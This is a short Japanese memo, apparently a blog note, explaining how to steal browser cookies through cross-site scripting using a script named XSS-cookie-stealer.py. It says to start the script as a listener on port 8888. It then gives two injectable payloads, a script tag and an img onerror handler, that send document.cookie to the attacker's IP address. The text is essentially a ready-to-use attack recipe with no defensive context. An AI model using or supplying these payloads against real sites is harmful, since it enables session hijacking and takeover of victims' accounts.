xssでcookieをとるのに便利なツール
使い方
まずはXSS-cookie-stealer.pyを実行する。これでポート8888でサーバがたつ。
python XSS-cookie-stealer.py
そしたら、xssの攻撃をする。
具体的に以下のようなペイロードを注入してやる(このペイロードは、XSS-cookie-stealer.py中のコメントでお勧めされてるもの):
<script> image = new Image(); image.src='http://X.X.X.X:8888/?'+document.cookie; </script>
X.X.X.X
はアタッカー側のIPアドレス。
ちなみに以下のペイロードでも可能:
<img src=x onerror=this.src='http://X.X.X.X:8888/?'%2bdocument.cookie;>
でもこれはonerrorに関するループの問題であまりお勧めできないと他の記事で書いてあった。